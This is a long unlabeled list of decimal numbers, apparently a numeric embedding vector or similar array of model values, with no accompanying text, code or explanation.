-0.027923475950956345, -0.004571700934320688, -0.0015414746012538671, -0.04426578804850578, 0.011674100533127785, 0.015870485454797745, -0.006723509635776281, -0.017957955598831177, -0.011767036281526089, -0.0023055097553879023, 0.01245332695543766, 0.013997482135891914, 0.008557193912565708, -0.025164013728499413, 0.010473091155290604, -0.06525485962629318, 0.039833489805459976, 0.02602187730371952, 0.010094201192259789, 0.010494537651538849, -0.018372589722275734, -0.000059983467508573085, -0.013361233286559582, -0.020788906142115593, -0.010930618271231651, 0.03648781776428223, -0.03603029251098633, 0.02646510675549507, -0.011559718288481236, -0.0006501001189462841, 0.000020636769477277994, -0.025121120736002922, -0.007173888385295868, 0.006719935219734907, -0.0027844838332384825, -0.01825820840895176, -0.023047948256134987, -0.02021699771285057, -0.029396142810583115, -0.024220362305641174, -0.00010220646800007671, 0.03231288120150566, 0.018901605159044266, -0.016499586403369904, 0.00036369863664731383, -0.003903281642124057, -0.006194493733346462, -0.02200421318411827, -0.02031708136200905, -0.018415482714772224, -0.009715311229228973, 0.0028863551560789347, 0.040062252432107925, -0.013232553377747536, 0.01638520509004593, 0.018229611217975616, -0.02911018766462803, -0.014369223266839981, -0.01173844002187252, -0.019430622458457947, -0.014740964397788048, -0.003138352883979678, 0.02829521708190441, 0.0036244757939130068, -0.0074920132756233215, -0.04958454519510269, -0.029038699343800545, 0.013561401516199112, -0.003613752545788884, 0.03431456536054611, -0.009944074787199497, -0.029539119452238083, -0.05656183883547783, 0.02905299700796604, 0.009836841374635696, -0.006877210456877947, 0.037603043019771576, 0.04652483016252518, -0.017028601840138435, 0.023762835189700127, -0.006237386725842953, 0.03634484112262726, 0.019888149574398994, 0.0265651922672987, -0.01655677706003189, -0.014740964397788048, -0.0018658543704077601, -0.02870985120534897, 0.009608077816665173, 0.01941632479429245, -0.00734188687056303, -0.006544788368046284, 0.008728766813874245, 0.01669975370168686, -0.0026504425331950188, 0.03645922243595123, 0.010294369421899319, -0.03359967842698097, 0.008063922636210918, 0.026136258617043495, 0.005125737749040127, -0.0018980243476107717, 0.0034028608351945877, -0.015327171422541142, 0.01830110140144825, 0.01861565001308918, 0.04186376929283142, -0.004257150460034609, -0.002478869864717126, 0.0073633333668112755, -0.008078220300376415, 0.007202484179288149, 0.007156016305088997, -0.02870985120534897, 0.005969304125756025, 0.03574433550238609, -0.014147608540952206, -0.006580532528460026, 0.02351977303624153, -0.005593988578766584, -0.007127420976758003, 0.010530281811952591, -0.027380162850022316, 0.0003531987313181162, -0.039661917835474014, -0.0209747776389122, 0.01701430417597294, 0.035687144845724106, -0.010851981118321419, 0.0043500857427716255, -0.0009865437168627977, -0.0008096092496998608, 0.004514509811997414, 0.0033563931938260794, 0.010451644659042358, -0.015584531240165234, -0.008235495537519455, 0.026350725442171097, 0.003054353641346097, 0.04186376929283142, 0.005615435540676117, -0.0037138366606086493, -0.0010866278316825628, -0.006312449928373098, -0.03451473265886307, 0.010651812888681889, -0.00762069271877408, -0.014447861351072788, -0.0010651812190189958, -0.009751055389642715, -0.005093568004667759, -0.010015563108026981, -0.023333903402090073, -0.0050864191725850105, 0.01508411020040512, 0.014447861351072788, 0.011888566426932812, 0.0019909595139324665, 0.0148410489782691, 0.0026004004757851362, -0.00031164594111032784, 0.00855004508048296, 0.003277755808085203, 0.014898239634931087, -0.0037031134124845266, 0.011681249365210533, -0.0008337366743944585, -0.0121602239087224, -0.01807233691215515, -0.00280056893825531, 0.016056356951594353, -0.023362498730421066, -0.006155174691230059, 0.003392137587070465, -0.022890673950314522, 0.0024717210326343775, -0.0014127949252724648, -0.008950382471084595, -0.00829983502626419, -0.011788482777774334, -0.00855004508048296, 0.0011089680483564734, -0.019230453297495842, 0.010587472468614578, 0.020331379026174545, 0.019073178991675377, -0.003115118946880102, 0.009250634349882603, -0.011995799839496613, -0.0241059809923172, 0.004289320670068264, 0.0006000580615364015, 0.0296820979565382, -0.028195133432745934, 0.006487597245723009, 0.004929143935441971, -0.009314973838627338, 0.0021947023924440145, 0.005082844756543636, -0.03237007185816765, -0.008628683164715767, 0.010387304238975048, 0.0014190501533448696, 0.0009642035001888871, 0.008800256066024303, 0.0038031975273042917, 0.009450802579522133, -0.015656020492315292, 0.008049624972045422, -0.006719935219734907, -0.019216155633330345, -0.002357339020818472, -0.017257366329431534, 0.007506310939788818, 0.002714782487601042, 0.007656436879187822, 0.029481928795576096, 0.003785325214266777, 0.014219097793102264, -0.011395295150578022, 0.01878722384572029, 0.00361017812974751, 0.00041686833719722927, 0.0007559927180409431, 0.0018944499315693974, 0.007906647399067879, 0.02575021982192993, 0.014369223266839981, 0.002872057491913438, -0.005551095586270094, 0.006380364298820496, 0.011273764073848724, -0.0176291074603796, 0.009086210280656815, 0.002005257410928607, -0.013940291479229927, -0.007820861414074898, -0.006798572838306427, 0.0073633333668112755, -0.00042379379738122225, -0.02442053146660328, 0.006194493733346462, 0.01678554154932499, -0.014304883778095245, 0.0016236865194514394, -0.012867961078882217, 0.014655178412795067, 0.0006447384948842227, -0.00020497143850661814, 0.00946510024368763, -0.007677883841097355, -0.00025088057736866176, -0.014955430291593075, 0.03431456536054611, 0.006419682875275612, 0.006273131351917982, -0.030911702662706375, -0.009936925955116749, 0.009436504915356636, 0.016985708847641945, -0.031054679304361343, 0.007080953102558851, 0.012374689802527428, -0.032570239156484604, -0.011145084165036678, 0.008693022653460503, -0.010573174804449081, 0.010315815918147564, -0.003234862582758069, 0.030254006385803223, -0.000921310274861753, -0.031397826969623566, -0.002321594627574086, -0.013232553377747536, -0.002795207081362605, 0.007613543886691332, 0.0013368382351472974, -0.01933053694665432, 0.015455851331353188, -0.0007233759970404208, 0.012346094474196434, 0.002789845457300544, -0.025964686647057533, -0.004535956308245659, -0.001270711189135909, 0.018858712166547775, -0.012860812246799469, -0.006516192574054003, -0.010094201192259789, 0.026593787595629692, 0.009136253036558628, 0.019444920122623444, 0.020645929500460625, 0.0011831375304609537, -0.033370912075042725, -0.01499832421541214, 0.0037388575728982687, -0.026322130113840103, -0.015470148995518684, -0.00646257633343339, -0.005647605285048485, 0.012038692831993103, -0.0062338123098015785, -0.027880582958459854, -0.010244326665997505, -0.001706792158074677, 0.006652021314948797, -0.028809936717152596, 0.017643405124545097, 0.03188394755125046, 0.03628765046596527, -0.015741806477308273, 0.028595469892024994, -0.008993275463581085, 0.0045466795563697815, -0.004303618334233761, -0.0012599879410117865, 0.0316837802529335, -0.006344619672745466, -0.0018122378969565034, -0.006866487208753824, -0.005765561480075121, 0.038089167326688766, 0.016857029870152473, -0.03039698489010334, 0.0093721654266119, 0.017157282680273056, 0.005225822329521179, 0.02942473813891411, -0.001998108346015215, 0.0017505788709968328, -0.0017264514463022351, 0.01109504234045744, 0.013389828614890575, 0.0038389419205486774, -0.016213631257414818, 0.003892558393999934, 0.000604972883593291, -0.0036637946031987667, -0.0003011460357811302, -0.0005647605285048485, -0.0015057302080094814, -0.03156939893960953, 0.0034439668525010347, 0.013997482135891914, 0.018229611217975616, 0.00801388081163168, 0.012074436992406845, 0.03196973353624344, 0.022175787016749382, 0.006995166651904583, -0.028466790914535522, -0.04878387227654457, -0.025592945516109467, 0.016370905563235283, 0.015727508813142776, -0.007863754406571388, 0.023276712745428085, 0.023462582379579544, 0.019073178991675377, -0.01285366341471672, 0.01735744997859001, 0.009951223619282246, -0.010716152377426624, -0.008828851394355297, 0.027079910039901733, -0.020774608477950096, -0.004657486919313669, 0.006648446898907423, -0.03308495879173279, 0.0034421796444803476, 0.019316239282488823, -0.0312548503279686, 0.023634156212210655, -0.0013877738965675235, 0.016842732205986977, -0.014047524891793728, -0.026350725442171097, 0.0120529904961586, -0.009179146029055119, -0.0005857603391632438, -0.01519849244505167, 0.0011947544990107417, 0.013346935622394085, -0.00582632701843977, -0.00906476378440857, 0.01437637209892273, 0.013118172064423561, -0.010930618271231651, -0.020746013149619102, 0.0252212043851614, -0.002319807419553399, 0.013675783760845661, -0.002932822797447443, 0.0015379000687971711, -0.0004566339193843305, -0.011023554019629955, -0.00901472195982933, 0.021761152893304825, -0.020231295377016068, -0.0006040792795829475, 0.011624058708548546, 0.0017720254836604, -0.017157282680273056, -0.0033653294667601585, -0.015026919543743134, -0.00015537616854999214, 0.005751263815909624, 0.012589155696332455, 0.02000253088772297, 0.010037009604275227, -0.020746013149619102, -0.02852398157119751, 0.008800256066024303, -0.024663593620061874, -0.013718676753342152, 0.00841421727091074, 0.007906647399067879, 0.003931877203285694, 0.02494954690337181, 0.0023519773967564106, 0.002777335001155734, 0.004703954793512821, -0.006294577848166227, -0.0009910117369145155, -0.02324811741709709, 0.006491171661764383, 0.025678731501102448, -0.013811611570417881, -0.00025266778538934886, 0.0033992864191532135, -0.02507822774350643, 0.016857029870152473, 0.012446178123354912, 0.010994957759976387, 0.014812453649938107, 0.0001528070424683392, 0.010851981118321419, -0.006258833687752485, -0.018958795815706253, -0.028366705402731895, 0.006398236379027367, 0.008156857453286648, -0.03494366258382797, 0.01861565001308918, -0.004271448124200106, 0.0032455858308821917, -0.017786381766200066, -0.02071741782128811, -0.006276705767959356, -0.018558459356427193, 0.013432721607387066, 0.016928518190979958, 0.008492854423820972, -0.03159799426794052, -0.005933559965342283, 0.027780499309301376, -0.04560977593064308, -0.017757786437869072, 0.012989492155611515, -0.009693864732980728, -0.031941138207912445, -0.008843149058520794, 0.00642683170735836, 0.014540796168148518, 0.029882265254855156, 0.004796890076249838, -0.01388310082256794, -0.026679573580622673, 0.011009255424141884, -0.011745588853955269, -0.012932301498949528, 0.006794998422265053, 0.010473091155290604, 0.0011447124416008592, 0.007656436879187822, -0.0017041112296283245, 0.0005089099868200719, -0.01638520509004593, 0.014755262061953545, -0.012017246335744858, 0.01448360551148653, 0.012846514582633972, -0.01777208410203457, -0.003274181392043829, 0.0038031975273042917, 0.011230871081352234, 0.004292895086109638, -0.01225315872579813, 0.009929777123034, 0.009515142999589443, 0.005118588916957378, -0.018801521509885788, 0.028638362884521484, 0.018401185050606728, -0.024005897343158722, 0.0076707350090146065, -0.011366698890924454, -0.005819178186357021, 0.007720776833593845, 0.012381838634610176, 0.010494537651538849, -0.02284778095781803, 0.02249033749103546, 0.0018551311222836375, -0.00886459555476904, -0.004364383406937122, -0.006047941744327545, -0.015112705528736115, -0.010608918964862823, -0.0045931474305689335, -0.028767041862010956, -0.014304883778095245, 0.008642980828881264, 0.006294577848166227, 0.014562242664396763, 0.0022679781541228294, 0.01559882890433073, -0.005658328533172607, -0.005661902949213982, 0.0074920132756233215, -0.01594197377562523, -0.015227087773382664, 0.01924475096166134, -0.0343717560172081, 0.026279237121343613, -0.00757779972627759, -0.0023376797325909138, 0.02244744449853897, 0.0011679462622851133, -0.006498320493847132, -0.014047524891793728, -0.0014512201305478811, -0.02901010401546955, 0.0067092119716107845, 0.023219522088766098, -0.023648453876376152, 0.01607065461575985, -0.00942220725119114, 0.011488229967653751, -0.004217831883579493, 0.011545420624315739, 0.0021303624380379915, 0.0025485712103545666, 0.006962996907532215, -0.004943442065268755, 0.006587681360542774, -0.0005969304475001991, 0.02267620712518692, -0.01424054428935051, -0.00794239155948162, 0.013911696150898933, 0.0029614183586090803, 0.008306983858346939, -0.010866278782486916, -0.004482340067625046, 0.0003141033521387726, -0.02825232408940792, 0.030768726021051407, 0.0017058985540643334, 0.011709844693541527, 0.007584948558360338, 0.004196385387331247, -0.006820019334554672, 0.012374689802527428, -0.010358708910644054, -0.013489913195371628, -0.012081585824489594, 0.011052149347960949, 0.005476032383739948, -0.012710686773061752, 0.0023716366849839687, -0.020502950996160507, -0.014054673723876476, 0.028137942776083946, 0.0272228866815567, -0.0005781646468676627, 0.023820025846362114, -0.029882265254855156, -0.013983184471726418, 0.0007886094390414655, -0.0098225437104702, -0.0254499688744545, -0.006008623167872429, 0.00942220725119114, -0.004110598936676979, -0.00957233365625143, 0.00875021331012249, 0.0003257202624808997, -0.012310349382460117, 0.00005336518006515689, -0.019516408443450928, 0.0007729713106527925, 0.009500844404101372, 0.01847267337143421, -0.0004488148260861635, -0.005879943259060383, -0.016899922862648964, -0.004664636217057705, -0.019487813115119934, 0.004532381892204285, -0.003138352883979678, 0.03016822040081024, 0.016499586403369904, 0.02124643325805664, 0.0207603108137846, -0.013082427904009819, 0.016170738264918327, -0.007785116787999868, -0.022919269278645515, 0.040148038417100906, 0.024792272597551346, -0.031626589596271515, 0.032741811126470566, -0.016799839213490486, -0.007770819123834372, 0.002564656315371394, 0.0038139207754284143, -0.008306983858346939, 0.012103032320737839, -0.0020749587565660477, -0.028266621753573418, 0.0020159806590527296, 0.0052651409059762955, 0.01883011683821678, -0.014226246625185013, 0.0028792063239961863, 0.006487597245723009, 0.007870903238654137, 0.014462159015238285, 0.001380625064484775, 0.0014833899913355708, -0.03991927579045296, -0.017114387825131416, -0.006444703787565231, 0.0027129952795803547, -0.006087260786443949, 0.026894038543105125, -0.008285537362098694, 0.005172205623239279, 0.0021339368540793657, 0.01905888132750988, -0.003549412591382861, 0.01674264669418335, 0.012582006864249706, 0.011531122960150242, 0.0116026122123003, -0.002162532415241003, -0.0036816666834056377, 0.004346511326730251, -0.00742052448913455, -0.008721617981791496, 0.007002315483987331, 0.0023484029807150364, 0.02111775428056717, 0.0015119854360818863, -0.005490330047905445, 0.007470566313713789, 0.001795259304344654, 0.002119639189913869, -0.021575281396508217, -0.007181037217378616, 0.004521658644080162, -0.0010070967255160213, 0.018415482714772224, 0.013089576736092567, 0.0011572228977456689, 0.001734493998810649, -0.002956056734547019, 0.006716360803693533, -0.005318757612258196, 0.006945124827325344, 0.004496637731790543, -0.004525233060121536, 0.006548362784087658, 0.00022172658646013588, -0.010716152377426624, 0.00011695100693032146, -0.010630365461111069, 0.00006646212568739429, 0.003626263001933694, 0.015327171422541142, -0.006523341406136751, -0.007327589206397533, -0.0006228450802154839, -0.007320440374314785, 0.0005942496354691684, -0.012546262703835964, -0.015255683101713657, -0.0005388458957895637, -0.0017720254836604, 0.0019570025615394115, 0.019030285999178886, 0.0038210696075111628, 0.019788065925240517, -0.002637932077050209, -0.0004327298956923187, 0.016413800418376923, -0.026894038543105125, -0.0017684510676190257, -0.00297392881475389, -0.054074034094810486, -0.0008234601700678468, -0.010616067796945572, 0.0045931474305689335, -0.0022733397781848907, 0.01714298501610756, -0.01995963789522648, 0.0043322136625647545, 0.004471616819500923, -0.019359132274985313, -0.007234653923660517, 0.001632622559554875, -0.0015298576327040792, 0.00777796795591712, 0.018629947677254677, -0.0031580121722072363, 0.006937975995242596, 0.004221406299620867, -0.016042059287428856, 0.026407916098833084, -0.0098225437104702, 0.004496637731790543, 0.018015146255493164, 0.016142142936587334, -0.010651812888681889, 0.02976788394153118, -0.005447437055408955, -0.0007014826405793428, -0.0060836863704025745, 0.0012805408332496881, 0.0026468681171536446, 0.0026701020542532206, -0.008078220300376415, -0.0185298640280962, -0.005493904463946819, -0.008542896248400211, -0.002062448300421238, -0.005232971161603928, 0.008900339715182781, 0.006798572838306427, -0.01807233691215515, 0.003486860077828169, -0.015913378447294235, -0.0001900034985737875, 0.010058456100523472, 0.018730033189058304, -0.004793315660208464, -0.004964888561517, 0.027623223140835762, 0.0012546262005344033, 0.005222247447818518, -0.008292686194181442, -0.001806876272894442, -0.0034243075642734766, 0.01499832421541214, -0.004439446609467268, -0.0018694287864491343, 0.007570650428533554, -0.009143401868641376, -0.00785660557448864, -0.004418000113219023, -0.013854505494236946, 0.02066022716462612, 0.009479397907853127, 0.021746855229139328, 0.02271910011768341, -0.005651179701089859, -0.01847267337143421, 0.022247275337576866, 0.009036168456077576, 0.0019891723059117794, -0.010008414275944233, -0.0053473529405891895, 0.008628683164715767, 0.022104298695921898, 0.0009079061564989388, 0.006841466296464205, 0.00942220725119114, -0.010058456100523472, -0.012667792849242687, -0.012667792849242687, 0.001588835846632719, 0.010916320607066154, 0.006487597245723009, 0.007763669826090336, -0.00381034635938704, -0.012946599163115025, -0.012875109910964966, 0.001180456718429923, 0.003275968600064516, 0.02143230475485325, 0.005204375367611647, 0.0011500740656629205, -0.0032420114148408175, -0.021303625777363777, -0.007484864443540573, 0.009915479458868504, 0.010508835315704346, 0.026708168908953667, -0.005107865668833256, -0.010630365461111069, -0.0015325384447351098, -0.008106815628707409, 0.010751896537840366, 0.01064466405659914, -0.005615435540676117, -0.0005308034014888108, -0.0076421392150223255, 0.007080953102558851, 0.03420018032193184, -0.015956271439790726, -0.006612702272832394, -0.005490330047905445, 0.029224570840597153, 0.003685241099447012, -0.00018251952133141458, 0.0015513042453676462, -0.01754332147538662, 0.02799496427178383, -0.029167378321290016, -0.01571321114897728, 0.004146343097090721, -0.016227928921580315, 0.0023358925245702267, -0.0131682138890028, -0.0019534281454980373, 0.02392011135816574, 0.00024172107805497944, -0.025507159531116486, -0.019387729465961456, -0.007120272144675255, -0.0016647925367578864, -0.0008587577030993998, 0.00912910420447588, 0.011309508234262466, -0.008464259095489979, -0.0015941974706947803, -0.014254841953516006, -0.026751061901450157, 0.010587472468614578, -0.04057697206735611, 0.013904547318816185, -0.003946174867451191, 0.012281754054129124, 0.015656020492315292, -0.0008265877841040492, 0.011559718288481236, -0.009765353053808212, 0.020545845851302147, -0.013182511553168297, -0.008128262124955654, 0.012481922283768654, 0.024048790335655212, -0.0005200800951570272, 0.000045099299313733354, -0.004864804446697235, -0.0072954194620251656, -0.0004182087432127446, -0.010115647688508034, -0.010909171774983406, 0.00044188936590217054, -0.007048783358186483, -0.019444920122623444, -0.0033957120031118393, 0.016213631257414818, -0.002541422378271818, 0.015684615820646286, -0.0004999739467166364, -0.008435663767158985, 0.02625064179301262, -0.006169472821056843, 0.0006760147516615689, 0.000559845706447959, 0.009758204221725464, 0.0004896974423900247, 0.01292515266686678, 0.00841421727091074, -0.009021870791912079, -0.023491177707910538, -0.002082107588648796, 0.0121602239087224, -0.006898656953126192, 0.011459634639322758, 0.01140244398266077, -0.015513041988015175, -0.005147184710949659, 0.020059721544384956, 0.017171580344438553, -0.0006183770601637661, -0.017957955598831177, -0.01368293259292841, 0.016013463959097862, -0.0057762847281992435, 0.016799839213490486, -0.004360808990895748, 0.0048898253589868546, -0.00885744672268629, -0.00412847101688385, 0.010873427614569664, 0.007878052070736885, 0.015741806477308273, -0.016285119578242302, 0.004468041937798262, 0.005701221991330385, 0.022990757599473, -0.008357025682926178, -0.02677965722978115, 0.00293461000546813, -0.015384363010525703, -0.011945757083594799, -0.013489913195371628, 0.006194493733346462, 0.02361985854804516, 0.006265982519835234, 0.01153827179223299, 0.012589155696332455, 0.005211524199694395, -0.000022940603230381384, -0.02017410472035408, 0.01348276436328888, 0.005236545577645302, -0.014855346642434597, -0.0039211539551615715, 0.019259048625826836, -0.02294786460697651, -0.009400760754942894, 0.007663585711270571, -0.003097246866673231, 0.02526409737765789, -0.0026468681171536446, -0.008621534332633018, 0.019587896764278412, -0.006948699243366718, 0.01567031815648079, -0.017128687351942062, -0.006055090576410294, -0.01508411020040512, 0.02677965722978115, -0.011173679493367672, 0.0005705690127797425, -0.005261566489934921, 0.021275030449032784, -0.008707320317626, 0.02575021982192993, 0.009021870791912079, -0.007216781843453646, 0.0035994546487927437, 0.001508411020040512, -0.00857149250805378, 0.0024484870955348015, 0.005093568004667759, -0.015470148995518684, -0.007849456742405891, -0.026894038543105125, 0.008185452781617641, 0.0031043956987559795, 0.006269556935876608, -0.0074920132756233215, -0.011195125989615917, 0.009079061448574066, -0.0023537646047770977, 0.0207603108137846, -0.006744956597685814, 0.00022764674213249236, -0.007484864443540573, -0.005897815804928541, 0.0001644239528104663, 0.009093359112739563, -0.01700000651180744, -0.014490754343569279, 0.014590838924050331, -0.0026289960369467735, -0.007227505091577768, 0.0033045639283955097, 0.006526915822178125, -0.018544161692261696, 0.03188394755125046, 0.01245332695543766, 0.007273972500115633, -0.0006885253242217004, 0.0038496651686728, 0.02191842719912529, -0.0030096732079982758, 0.020545845851302147, -0.0092649320140481, -0.01437637209892273, -0.010465942323207855, 0.0067556798458099365, -0.0006550149992108345, -0.001547729829326272, 0.016814136877655983, 0.01504121720790863, 0.003111544530838728, -0.006033644080162048, 0.032656025141477585, -0.025235502049326897, -0.002344828564673662, 0.002276914194226265, 0.0015816868981346488, 0.0036387734580785036, 0.012682090513408184, 0.0011563292937353253, -0.013990333303809166, 0.004335788078606129, -0.01901598833501339, -0.0009065657504834235, 0.0005017611547373235, -0.000738567381631583, 0.00020698204752989113, 0.003710262244567275, -0.0013511358993127942, 0.0008511620108038187, 0.0011438188375905156, -0.011931459419429302, -0.003953323699533939, 0.0014556881505995989, 0.010115647688508034, 0.00321341585367918, -0.0018184931250289083, -0.0006259726942516863, -0.0196450874209404, -0.0017791744321584702, -0.005254417657852173, -0.018687140196561813, 0.005879943259060383, 0.032341476529836655, -0.0005080163828097284, -0.024263255298137665, -0.004217831883579493, -0.0006652915035374463, -0.01918756030499935, -0.00022429571254178882, 0.00015716337657067925, 0.0003838048141915351, -0.009429356083273888, 0.006090835202485323, -0.00901472195982933, 0.006487597245723009, -0.01750042662024498, 0.014233395457267761, -0.017614809796214104, -0.007080953102558851, 0.00702018802985549, -0.00850715208798647, -0.0013386254431679845, 0.020645929500460625, 0.006244535557925701, 0.024220362305641174, -0.01457654032856226, -0.009350718930363655, 0.0054974788799881935, 0.007584948558360338, 0.017571916803717613, -0.034657709300518036, -0.004961314145475626, 0.007785116787999868, -0.0023341053165495396, 0.012832216918468475, -0.007592097390443087, 0.013847356662154198, -0.0034564773086458445, -0.018587054684758186, -0.00023635942488908768, 0.02223297767341137, 0.014347776770591736, -0.009186294861137867, -0.00726324925199151, -0.015184194780886173, -0.00022965736570768058, 0.02534988336265087, 0.006998741067945957, 0.01555593591183424, 0.0035780081525444984, -0.028952913358807564, 0.014404968358576298, -0.004761145915836096, 0.012195968069136143, 0.014369223266839981, 0.018644247204065323, 0.033628273755311966, -0.008914637379348278, -0.03151220828294754, 0.0092649320140481, -0.010701854713261127, -0.007534906268119812, 0.016399502754211426, -0.009350718930363655, 0.021761152893304825, 0.007563501596450806, 0.017843572422862053, 0.0022644037380814552, -0.015727508813142776, -0.00013448807294480503, 0.002578953979536891, 0.007170313969254494, 0.007749372161924839, -0.01611354760825634, -0.0016746221808716655, -0.008650129660964012, -0.007095250766724348, 0.0006005048635415733, -0.02093188464641571, 0.019573599100112915, 0.014912537299096584, 0.01785787008702755, 0.0013234340585768223, 0.0072310795076191425, -0.010437346063554287, 0.013425572775304317, -0.0071023995988070965, 0.005619009956717491, -0.023734239861369133, -0.00646257633343339, -0.0020928308367729187, 0.006880784872919321, -0.011624058708548546, 0.013225404545664787, -0.013161065056920052, 0.006898656953126192, 0.014626583084464073, -0.02200421318411827, -0.024577805772423744, -0.002693335758522153, 0.02472078427672386, -0.008564343675971031, 0.006219514645636082, 0.007377631030976772, -0.009450802579522133, -0.0045752753503620625, -0.0036334118340164423, 0.02396300435066223, 0.015513041988015175, -0.01401892863214016, -0.0019909595139324665, -0.0009463313035666943, -0.044208597391843796, 0.003168735420331359, 0.0007970987353473902, -0.0025056779850274324, 0.00560113787651062, 0.003393924795091152, 0.016399502754211426, -0.011431039310991764, -0.011716993525624275, -0.017285961657762527, 0.01479815598577261, 0.007970986887812614, 0.007892349734902382, -0.0027094208635389805, -0.0008560768910683692, -0.014669476076960564, 0.007349035702645779, 0.007735074497759342, 0.005483181215822697, -0.002519975882023573, -0.0042678737081587315, -0.017428938299417496, 0.004703954793512821, 0.012424731627106667, 0.0032009053975343704, 0.0015209215926006436, -0.006276705767959356, 0.006616276688873768, 0.003097246866673231, 0.009922628290951252, -0.04669640213251114, -0.025106823071837425, -0.0077064791694283485, -0.008757363073527813, -0.00022329040803015232, 0.009629524312913418, 0.015127003192901611, 0.004814762156456709, 0.0036602201871573925, -0.03128344565629959, -0.0060014743357896805, -0.02713710069656372, -0.0036191141698509455, 0.005236545577645302, 0.009536589495837688, 0.011874268762767315, 0.018100932240486145, 0.006376789882779121, -0.0065590860322117805, 0.008592939004302025, -0.029138782992959023, -0.0022912120912224054, 0.003154437756165862, 0.027608925476670265, -0.009793948382139206, 0.01883011683821678, -0.006877210456877947, -0.004571700934320688, -0.003917579539120197, -0.008335579186677933, 0.0010205007856711745, -0.004646763671189547, 0.013933142647147179, 0.009386463090777397, -0.03379984572529793, -0.015641722828149796, -0.013647188432514668, -0.023362498730421066, -0.012224563397467136, -0.011845673434436321, -0.01113793533295393, 0.013990333303809166, -0.00749916210770607, 0.0071488674730062485, 0.02044576033949852, -0.010430197231471539, -0.004907697439193726, 0.0029792904388159513, -0.001172414282336831, -0.005987176671624184, -0.01348276436328888, 0.0025896772276610136, -0.015269980765879154, 0.010015563108026981, -0.014755262061953545, 0.00013728060002904385, 0.004689657129347324, 0.004535956308245659, 0.005057823844254017, 0.010544579476118088, -0.01624222658574581, 0.009457951411604881, 0.021060563623905182, 0.0029095890931785107, -0.003408222459256649, -0.027823392301797867, -0.016227928921580315, 0.026536595076322556, -0.0009499057778157294, 0.008886042051017284, -0.013139618560671806, -0.025564350187778473, -0.0017300259787589312, 0.014769559726119041, 0.0029864392708986998, -0.032570239156484604, 0.0009463313035666943, -0.008006731979548931, -0.013554252684116364, -0.007513459771871567, 0.010394453071057796, 0.012224563397467136, -0.0012072649551555514, 0.013918844982981682, -0.013697230257093906, -0.01519849244505167, -0.0030775873456150293, -0.002693335758522153, 0.01062321662902832, -0.01229605171829462, -0.02713710069656372, -0.01305383164435625, 0.004947016481310129, 0.0071309953927993774, -0.0003931877145078033, -0.017915062606334686, 0.017529023811221123, 0.001746110850945115, 0.00110807444434613, -0.006787849590182304, 0.02177545055747032, -0.0165138840675354, 0.011323805898427963, 0.007406226824969053, -0.013940291479229927, -0.013504210859537125, -0.0004032408178318292, 0.021889831870794296, -0.010251475498080254, -0.012353243306279182, -0.018058039247989655, 0.006980868987739086, -0.004239278379827738, 0.007506310939788818, 0.014633731916546822, 0.0024663591757416725, 0.008306983858346939, 0.003029332496225834, 0.0156274251639843, 0.010902022942900658, 0.001881939359009266, -0.005143610294908285, 0.02732297219336033, -0.02259042114019394, -0.014362074434757233, 0.02035997435450554, -0.014026078395545483, -0.00850715208798647, -0.011845673434436321, -0.002241170033812523, -0.0006608234252780676, 0.012174521572887897, 0.0004879102052655071, -0.023648453876376152, -0.00044188936590217054, 0.0017898976802825928, -0.018858712166547775, 0.022018510848283768, -0.001616537687368691, 0.012889407575130463, 0.005490330047905445, -0.015141300857067108, 0.004307192750275135, 0.00516505679115653, 0.021403709426522255, 0.013990333303809166, -0.007109548896551132, 0.005232971161603928, 0.00757779972627759, -0.030025243759155273, -0.0015316448407247663, 0.03817495331168175, 0.0060372184962034225, -0.01368293259292841, -0.016628265380859375, 0.012188819237053394, 0.003179458901286125, 0.006805721670389175, 0.02008831687271595, -0.008743064478039742, -0.0004946122644469142, -0.0015298576327040792, 0.005465309135615826, 0.007241802755743265, 0.011566867120563984, 0.009486546739935875, -0.013654337264597416, 0.017786381766200066, 0.004096301272511482, 0.004664636217057705, 0.006190919317305088, -0.0037960486952215433, 0.002637932077050209, 0.0032009053975343704, -0.01714298501610756, 0.002460997551679611, 0.030053839087486267, 0.004192810971289873, 0.0020141934510320425, -0.008785958401858807, -0.00906476378440857, -0.03777461498975754, 0.0032455858308821917, -0.01508411020040512, -0.0010857342276722193, 0.0036012420896440744, -0.017157282680273056, -0.000014786426618229598, 0.008106815628707409, -0.0000286513204628136, 0.01508411020040512, 0.014412117190659046, 0.0243204478174448, -0.019359132274985313, -0.03022541105747223, -0.015741806477308273, 0.0036745178513228893, 0.016456693410873413, 0.0017005368135869503, -0.01714298501610756, 0.018801521509885788, -0.028195133432745934, -0.00036794328480027616, 0.005651179701089859, 0.005290161818265915, -0.018243908882141113, -0.011123637668788433, 0.0033206490334123373, -0.011145084165036678, 0.0007108654826879501, -0.008950382471084595, -0.0037174110766500235, -0.007334738038480282, -0.0062338123098015785, 0.005733391735702753, -0.010709003545343876, 0.018544161692261696, -0.01665686070919037, 0.00041508112917654216, 0.004353660158813, 0.0003558795724529773, 0.015684615820646286, 0.004525233060121536, 0.009050466120243073, -0.0037424322217702866, 0.009114805608987808, -0.003349244361743331, -0.0032831174321472645, 0.0016084951348602772, 0.004896974191069603, -0.014455010183155537, 0.004646763671189547, -0.0104873888194561, 0.008206900209188461, 0.02066022716462612, -0.008164006285369396, 0.004643189255148172, -0.013704379089176655, 0.00910765677690506, -0.00650546932592988, -0.006802147254347801, -0.00321341585367918, 0.00252176309004426, -0.0004421127669047564, 0.00031164594111032784, 0.00801388081163168, 0.03277041018009186, 0.0162994172424078, -0.03199833258986473, 0.004793315660208464, -0.003208054229617119, 0.00781371258199215, -0.021089158952236176, -0.005586839746683836, 0.012281754054129124, -0.005511777009814978, -0.019387729465961456, -0.0272228866815567, -0.013861654326319695, -0.005565393250435591, 0.005025653634220362, 0.0011143296724185348, 0.018858712166547775, -0.0010535643668845296, 0.007463417481631041, 0.0007533119060099125, 0.008728766813874245, 0.006723509635776281, 0.0176291074603796, -0.004975611809641123, -0.00023792324645910412, -0.02053154818713665, 0.01189571525901556, 0.01270353700965643, 0.018687140196561813, 0.004239278379827738, -0.022619016468524933, 0.01665686070919037, -0.0009499057778157294, 0.0031294168438762426, 0.004868378862738609, -0.02437763847410679, -0.004264299292117357, 0.0032598834950476885, -0.01924475096166134, -0.0054116928949952126, 0.03803197667002678, 0.003586944192647934, 0.003788899863138795, 0.0026468681171536446, 0.01777208410203457, 0.00630530109629035, 0.0148410489782691, 0.003072225721552968, 0.009701013565063477, -0.00005548749686568044, -0.019130369648337364, -0.008035327307879925, 0.00377102755010128, 0.006587681360542774, -0.016814136877655983, 0.01109504234045744, -0.008492854423820972, -0.008335579186677933, 